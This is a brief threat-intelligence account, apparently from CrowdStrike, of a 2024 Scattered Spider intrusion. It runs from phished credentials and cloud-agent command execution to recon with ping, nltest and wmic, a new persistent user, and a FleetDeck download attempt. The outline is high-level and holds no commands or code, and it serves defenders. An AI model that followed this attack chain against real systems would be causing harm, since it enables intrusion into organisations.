In May 2024, CrowdStrike observed the cyber threat group Scattered Spider establish a foothold on a cloud-hosted virtual machine (VM) using a cloud service VM management agent. The attackers compromised existing credentials through a phishing campaign to authenticate to the cloud control plane. Once authenticated, they established persistence by executing commands on the cloud-hosted VM via the management agent.
After gaining initial access, Scattered Spider used the ping command to test connectivity to various domains within and outside the target organization, likely to assess their level of access and visibility. They then ran multiple variations of the nltest command to identify domain controllers (DCs) of interest and used the wmic command to identify programs currently installed on the host.
The attackers solidified their persistence by creating a new user on the host and attempted to download FleetDeck remote access software.
The attack spanned three different operational domains: email, cloud management, and within a VM. This multi-domain approach made it difficult to detect the attack in any single domain.